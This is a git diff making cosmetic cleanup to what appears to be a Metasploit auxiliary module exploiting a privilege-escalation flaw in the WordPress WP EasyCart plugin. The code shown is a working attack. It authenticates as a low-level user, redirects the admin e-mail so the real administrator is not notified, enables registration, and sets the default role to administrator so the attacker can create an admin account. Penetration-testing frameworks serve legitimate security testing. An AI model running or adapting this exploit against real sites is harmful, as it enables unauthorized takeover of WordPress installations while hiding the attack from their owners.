Do minor cleanup
jvazquez-r7
parent
3b21de3906
commit
349d7cb9ee
|
|
@ -13,18 +13,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
info,
|
||||
'Name' => 'WordPress WP EasyCart Plugin Privilege Escalation',
|
||||
'Description' => %q{
|
||||
The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20
|
||||
allows authenticated users of any user level to set any system
|
||||
option via a lack of validation in the ec_ajax_update_option
|
||||
and ec_ajax_clear_all_taxrates functions located in
|
||||
/inc/admin/admin_ajax_functions.php.
|
||||
|
||||
The module first changes the admin e-mail address to prevent any
|
||||
notifications being sent to the actual administrator during the
|
||||
attack, re-enables user registration in case it has been disabled
|
||||
and sets the default role to be administrator. This will allow for
|
||||
the user to create a new account with admin privileges via the
|
||||
default registration page found at /wp-login.php?action=register.
|
||||
The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated
|
||||
users of any user level to set any system option via a lack of validation in the
|
||||
ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in
|
||||
/inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address
|
||||
to prevent any notifications being sent to the actual administrator during the attack,
|
||||
re-enables user registration in case it has been disabled and sets the default role to
|
||||
be administrator. This will allow for the user to create a new account with admin
|
||||
privileges via the default registration page found at /wp-login.php?action=register.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
|
@ -69,33 +65,39 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if res.nil?
|
||||
vprint_error("#{peer} - No response from the target.")
|
||||
else
|
||||
vprint_warning("#{peer} - Server responded with status code #{res.code}") if res.code != 200
|
||||
elsif res.code != 200
|
||||
vprint_warning("#{peer} - Server responded with status code #{res.code}")
|
||||
end
|
||||
|
||||
return res
|
||||
res
|
||||
end
|
||||
|
||||
def run
|
||||
print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
|
||||
cookie = wordpress_login(username, password)
|
||||
fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
|
||||
if cookie.nil?
|
||||
print_error("#{peer} - Failed to authenticate with WordPress")
|
||||
return
|
||||
end
|
||||
print_good("#{peer} - Authenticated with WordPress")
|
||||
|
||||
new_email = "#{Rex::Text.rand_text_alpha(5)}@#{Rex::Text.rand_text_alpha(5)}.com"
|
||||
print_status("#{peer} - Changing admin e-mail address to #{new_email}...")
|
||||
if set_wp_option('admin_email', new_email, cookie).nil?
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to change the admin e-mail address')
|
||||
print_error("#{peer} - Failed to change the admin e-mail address")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{peer} - Enabling user registrations...")
|
||||
if set_wp_option('users_can_register', 1, cookie).nil?
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to enable user registrations')
|
||||
print_error("#{peer} - Failed to enable user registrations")
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{peer} - Setting the default user role...")
|
||||
if set_wp_option('default_role', 'administrator', cookie).nil?
|
||||
fail_with(Failure::UnexpectedReply, 'Failed to set the default user role')
|
||||
print_error("#{peer} - Failed to set the default user role")
|
||||
return
|
||||
end
|
||||
|
||||
register_url = normalize_uri(target_uri.path, 'wp-login.php?action=register')
|
||||
|
|
|
|||
Loading…
Reference in New Issue